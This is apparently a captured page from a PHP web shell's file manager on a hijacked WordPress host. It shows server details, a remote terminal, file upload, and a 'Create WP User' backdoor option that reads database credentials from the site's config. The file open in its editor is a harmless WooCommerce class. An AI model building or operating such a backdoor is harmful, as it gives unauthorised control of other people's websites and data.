Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat_30102025
/
wp-content
/
plugins
/
woocommerce
/
src
/
Blocks
/
Domain
/
Services
/
Email
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
CustomerNewAccount.php
578.00 B
-rw-r--r--
2025-08-13 01:18
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
CustomerNewAccount.php
<?php declare( strict_types=1 ); namespace Automattic\WooCommerce\Blocks\Domain\Services\Email; use Automattic\WooCommerce\Blocks\Domain\Package; /** * Customer New Account. Previously used for blocks, but now replaced by the core email. * * @deprecated This class can't be removed due to https://github.com/woocommerce/woocommerce/issues/52311. */ class CustomerNewAccount extends \WC_Email { /** * Constructor. * * @param Package $package An instance of (Woo Blocks) Package. */ public function __construct( Package $package ) { parent::__construct(); } }
关闭
保存